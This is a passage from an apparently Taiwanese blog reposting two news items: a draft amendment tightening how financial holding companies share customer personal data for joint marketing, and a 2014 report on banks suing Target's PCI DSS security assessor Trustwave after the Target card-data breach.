不過修正之後,除了姓名與地址之外,其他客戶的資料必須要客戶同意之後,金控公司共同行銷時才可以使用,以符合個資法的規定。

立法院財政委員會也通過國民黨立委盧秀燕的提案,要求金管會要全面監理金融業舊有的契約,是否符合個資法的規定。

曾銘宗表示,目前金控法第43條僅是初審通過,尚未完全定案。但是金管會將清查金融業使用個資資料,是否符合現行的規定。例如證券、保險的個資來源是什麼,是否有違反規定等。

達文西個資暨高科技法律事務所表示:
立法院財委會初審通過金控法第43條第2項修正草案,未來金控公司對於客戶,除了姓名、地址可提供給旗下相關子公司之外,客戶其餘個人資料,包括電話、生日、身分證字號等,都回歸個資法適用範圍,必須客戶提供書面同意,才能提供給其他公司共同行銷。
現行規定,金控公司旗下銀行、保險和證券等公司,取得客戶個人資料之後,只要客戶不反對,就可運用這些資料進行共同行銷,但有關交易金額、買賣等交易資 料,則必須客戶書面同意才能提供。這被外界視為是個資法上路之後,對金控業者開的巧門,讓金控可以共同行銷,但也造成民眾或投資人許多困擾。


轉載自《中央社 / 達文西個資暨高科技法律事務所》

2014年4月2日 星期三

史上少見 資安稽核員被提起訴訟

史上少見 資安稽核員被提起訴訟

在2013年12月,美國連鎖零售商店業者Target證實遭到駭客入侵,駭客在POS系統中植入了惡意程式,攔截了短暫存在記憶體中的未加密持卡人資料,導致眾多消費者的交易資料,包括姓名、信用卡號、有效日期及卡片背面的安全碼,估計約有四千萬張信用卡資料已經被竊取外洩。

對此,Target除了面臨來自客戶的訴訟官司之外,根據國外媒體指出,目前已有兩家銀行(Trustmark National Bank, Green Bank N.A.)正式對提供Target安全服務的廠商Trustwave,提出了損害賠償和法律責任告訴,因為Trustwave在2013年9月20日曾經為 Target執行了網路安全掃瞄,並且告知Target並未發現任何安全弱點,但是後來卻發生了此一嚴重的資料外洩事件,這也就顯示Trustwave的資安稽核員,在進行遵循支付卡行業資料安全標準(PCI DSS)的安全評估時,有過失且未盡到其應有的責任來確認Target的系統安全。

PCI DSS是由五家知名的電子支付與信用卡業者所共同組成的PCI安全標準協會提出,讓所有提供信用卡交易服務的商店可以共同遵守,以預防可能發生資料外洩事件的資料安全標準。在PCI DSS的要求中,Trustwave是一家合格認可的安全評估廠商,負責對於需要遵循PCI DSS標準的商店實施安全稽核評估。在這個事件中,Trustwave除了提供Target安全掃瞄服務之外,還提供了其他安全產品,以協助其能夠符合PCI DSS中的12項安全要求。

依據PCI DSS的規定,提供信用卡交易服務的店家必須接受合格的安全評估廠商,實施每年一次的資安稽核,並且在每一季針對其網路環境進行弱點掃瞄,以確認是否遵循了PCI DSS的要求。但是近年來,即使店家通過了安全評估廠商定期的安全掃瞄,確認已符合了PCI DSS的要求,卻還是發生了資訊安全事件,對此,許多店家認為,這些進行安全評估與稽核的人員,也應該要對資安事件負起責任。

以Target事件為例,兩家銀行控訴Trustwave作為PCI安全標準協會所認可的安全評估服務供應商,但是卻未盡到應有的安全稽核責任,在評估過程中並未識別出Target可能具有的安全弱點與風險,因而導致了此一嚴重入侵事件的發生,讓駭客可以非法取得四千萬筆的信用卡資料,以及其他七千萬筆的個人資訊。

對於這樣的指控,有安全專家表示不以為然,因為對資安稽核員來說,所獲得的相關資料大都是由受稽方所提供,如果Target並未提供足夠且明確關於其網路組態和安全措施的資訊,在沒有實際進行廣泛且需耗費成本的詳盡測試之下,Trustwave很難僅憑資安稽核員的一己之力,就可以獲得完整的稽核證據,並以此來作出其專業判斷。同時,如果安全評估廠商每次都要求高額的費用來進行定期且徹底的安全掃瞄,這種作法恐怕也很難被客戶和市場所接受。

不過,也有其他專家認為,這個事件正好突顯出了某些提供安全評估服務的廠商,因為礙於時間和成本的壓力,而採取了不夠嚴謹的檢核表勾選作法,並無法反映出店家實際的安全現況,此次鬧上法庭的官司訴訟,對於提供安全服務和產品的廠商而言,無疑是正式敲響了一記警鐘。

註:2014/4/1兩家銀行已經撤回對於Trustwave所提出的告訴。

轉載自《資安人》